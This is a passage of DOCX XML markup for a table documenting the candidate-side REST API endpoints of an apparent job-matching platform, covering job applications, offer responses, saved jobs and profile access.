              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path: jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK: { matchScore: 92, matchingSkills: [...], missingSkills: [...] }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/jobs/{id}/apply</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path: jobId, { coverLetter }</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>201 Created: ApplicationDto (status: APPLIED)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/applications/my-applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK: List&lt;ApplicationDto&gt; with interview details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/applications/{id}/withdraw</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path: applicationId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK: { message: 'Application withdrawn' }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/offers/{id}/respond</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path: offerId, { status: 'ACCEPTED' }</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK: Updated OfferDto (status: ACCEPTED)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/saved-jobs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK: List&lt;JobDto&gt; of bookmarked opportunities</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/saved-jobs/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path: jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>201 Created: { message: 'Job bookmarked' }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DELETE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/saved-jobs/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Path: jobId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK: { message: 'Bookmark removed' }</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>GET</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/profiles/me</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2448"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>200 OK: CandidateProfileDto with skills list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1152"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>PUT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>/api/profiles/me</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
